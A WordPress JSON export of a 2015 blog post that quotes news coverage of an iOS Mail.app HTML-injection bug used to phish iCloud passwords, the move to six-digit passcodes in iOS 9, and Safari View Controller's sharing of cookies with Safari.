{"id":11447,"date":"2015-06-11T13:08:24","date_gmt":"2015-06-11T17:08:24","guid":{"rendered":"http:\/\/mjtsai.com\/blog\/?p=11447"},"modified":"2020-02-24T15:44:34","modified_gmt":"2020-02-24T20:44:34","slug":"icloud-passwords-in-mail-device-passwords-and-safari-passwords","status":"publish","type":"post","link":"https:\/\/mjtsai.com\/blog\/2015\/06\/11\/icloud-passwords-in-mail-device-passwords-and-safari-passwords\/","title":{"rendered":"iCloud Passwords in Mail, Device Passwords, and Safari Passwords"},"content":{"rendered":"<p><a href=\"http:\/\/arstechnica.com\/security\/2015\/06\/serious-ios-bug-makes-it-easy-to-steal-users-icloud-passwords\/\">Dan Goodin<\/a>:<\/p>\n<blockquote cite=\"http:\/\/arstechnica.com\/security\/2015\/06\/serious-ios-bug-makes-it-easy-to-steal-users-icloud-passwords\/\">\n<p>The <a href=\"https:\/\/github.com\/jansoucek\/iOS-Mail.app-inject-kit\/tree\/master\">proof-of-concept attack<\/a> exploits a flaw in Mail.app, the default iOS e-mail program. Since <a href=\"http:\/\/arstechnica.com\/apple\/2015\/04\/ios-8-3-released-with-fixes-for-performance-and-just-about-everything-else\/\">the release of version 8.3 in early April<\/a>, the app has failed to properly strip out potentially dangerous HTML code from incoming e-mail messages. The proof-of-concept exploit capitalizes on this failure by downloading a form from a remote server that looks identical to the legitimate iCloud log-in prompt. It can be displayed each time the booby-trapped message is viewed.<\/p>\n<p>&ldquo;This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message,&rdquo; a user with the GitHub name jansoucek wrote in a readme file accompanying the exploit. &ldquo;JavaScript is disabled in this UIWebView, but it is still possible to build a functional password &lsquo;collector&rsquo; using simple HTML and CSS [<a href=\"http:\/\/en.wikipedia.org\/wiki\/Cascading_Style_Sheets\">cascading style sheets<\/a>].&rdquo;<\/p>\n<\/blockquote>\n<p><a href=\"http:\/\/www.macrumors.com\/2015\/06\/10\/new-ios-mail-bug-icloud-passwords\/\">Mitchel Broussard<\/a> (<a href=\"https:\/\/news.ycombinator.com\/item?id=9690309\">comments<\/a>):<\/p>\n<blockquote cite=\"http:\/\/www.macrumors.com\/2015\/06\/10\/new-ios-mail-bug-icloud-passwords\/\"><p>Soucek says that Apple did not respond to his discovery of the bug when he stumbled across it back in January.<\/p>\n<p>[&#8230;]<\/p>\n<p>Soucek kept the details of the bug only between himself and Apple, letting the company have time to possibly fix the attack and inform him of its progress. Given the company&rsquo;s remaining quietness on the subject, he decided to publish the proof of concept - called the Mail.app inject kit - on <a href=\"https:\/\/github.com\/jansoucek\/iOS-Mail.app-inject-kit\/tree\/master\">GitHub<\/a> in hopes of spreading its awareness.<\/p><\/blockquote>\n<p><a href=\"http:\/\/arstechnica.com\/apple\/2015\/06\/apple-to-require-6-digit-passcodes-on-newer-iphones-ipads-under-ios-9\/\">Cyrus Farivar<\/a>:<\/p>\n<blockquote cite=\"http:\/\/arstechnica.com\/apple\/2015\/06\/apple-to-require-6-digit-passcodes-on-newer-iphones-ipads-under-ios-9\/\"><p>As part of its iOS 9 <a href=\"http:\/\/arstechnica.com\/apple\/2015\/06\/apple-announces-ios-9\/\">announcement<\/a> on Monday, Apple revealed that all newer iDevices equipped with TouchID and running the newer version of the operating system will be required to upgrade from a four-digit to a six-digit passcode. Passcodes remain optional, and users can create a more complex alphanumeric password, but six digits will be the minimum. After 10 failed attempts to type in the code, the device will erase itself.<\/p><\/blockquote>\n<p><a href=\"http:\/\/www.imore.com\/safari-view-controller-will-bring-persistent-logins-web-view-ios-apps\">Dan Thorp-Lancaster<\/a>:<\/p>\n<blockquote cite=\"http:\/\/www.imore.com\/safari-view-controller-will-bring-persistent-logins-web-view-ios-apps\"><p>The issue up until now has been that web view hasn&rsquo;t been allowed to store cookies for security reasons, so logins can&rsquo;t persist. The solution that Safari view controller brings to the table is to essentially pull the information from Safari.<\/p><\/blockquote>\n<p><a href=\"https:\/\/developer.apple.com\/library\/safari\/releasenotes\/General\/WhatsNewInSafari\/Articles\/Safari_9.html\">Apple<\/a>:<\/p>\n<blockquote cite=\"https:\/\/developer.apple.com\/library\/safari\/releasenotes\/General\/WhatsNewInSafari\/Articles\/Safari_9.html\"><p>You can use <code>SFSafariViewController<\/code> to display web content within your app. The Safari View Controller shares cookies and other website data with Safari, and has many of Safari&rsquo;s features, like Safari AutoFill and Safari Reader. Unlike Safari itself, the Safari View Controller UI is tailored for displaying a single page, featuring a Done button that&rsquo;ll take users right back where they were in your app.<\/p><p>Consider replacing your <code>WKWebView<\/code> or <code>UIWebView<\/code>-based browsers with <code>SFSafariViewController<\/code> if your app displays web content but does not customize that content.<\/p><\/blockquote>","protected":false},"excerpt":{"rendered":"<p>Dan Goodin: The proof-of-concept attack exploits a flaw in Mail.app, the default iOS e-mail program. Since the release of version 8.3 in early April, the app has failed to properly strip out potentially dangerous HTML code from incoming e-mail messages. The proof-of-concept exploit capitalizes on this failure by downloading a form from a remote server [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"apple_news_api_created_at":"2020-02-24T20:44:36Z","apple_news_api_id":"aedaf529-c66c-44ee-ab70-36458708072a","apple_news_api_modified_at":"2020-02-24T20:44:37Z","apple_news_api_revision":"AAAAAAAAAAD\/\/\/\/\/\/\/\/\/\/w==","apple_news_api_share_url":"https:\/\/apple.news\/Artr1KcZsRO6rcDZFhwgHKg","apple_news_coverimage":0,"apple_news_coverimage_caption":"","apple_news_is_hidden":false,"apple_news_is_paid":false,"apple_news_is_preview":false,"apple_news_is_sponsored":false,"apple_news_maturity_rating":"","apple_news_metadata":"\"\"","apple_news_pullquote":"","apple_news_pullquote_position":"","apple_news_slug":"","apple_news_sections":"\"\"","apple_news_suppress_video_url":false,"apple_news_use_image_component":false,"footnotes":""},"categories":[2],"tags":[131,69,31,904,1137,597,48,96,1926],"class_list":["post-11447","post","type-post","status-publish","format-standard","hentry","category-technology","tag-bug","tag-cocoa","tag-ios","tag-ios-8","tag-ios-9","tag-mobilemail","tag-security","tag-web","tag-wkwebview"],"apple_news_notices":[],"_links":{"self":[{"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/posts\/11447","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/comments?post=11447"}],"version-history":[{"count":2,"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/posts\/11447\/revisions"}],"predecessor-version":[{"id":11451,"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/posts\/11447\/revisions\/11451"}],"wp:attachment":[{"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/media?parent=11447"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/categories?post=11447"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mjtsai.com\/blog\/wp-json\/wp\/v2\/tags?post=11447"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}